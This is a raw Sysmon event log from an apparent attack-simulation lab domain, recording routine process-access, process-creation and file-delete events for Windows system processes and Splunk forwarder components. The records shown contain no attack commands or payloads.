07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806270Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806269Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806268Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806267Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806266Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806265Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806264Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.781{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806263Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.767{0C1E0330-F314-60EB-4379-00000000D001}2312C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806262Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBB3BD49C72131FB82AA54B5E2139646,SHA256=6C358A688465CD581782880AB29B6D9FC9E4E7F153A137D296D8A30BE69E02D5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806261Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806260Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806259Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806258Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806257Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806256Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806255Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806254Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806253Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806252Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806251Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806250Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.235{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806249Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:24.220{0C1E0330-F314-60EB-4279-00000000D001}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001046426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:25.621{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=481C3EF4A23F91119FA7676384D4C03E,SHA256=104D0322832975DC76496D1454B72DF7D475DFE423B45B976A50762D382E38EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.547{0C1E0330-F315-60EB-4479-00000000D001}23601304C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D996259B1A57BBAEE42E1EB3A982741,SHA256=FF323D5B820135369061379DB0D0879D3D67D7BB9B0AB80A4D1F0C60F1D420B7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F315-60EB-4479-00000000D001}2360C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:25.406{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 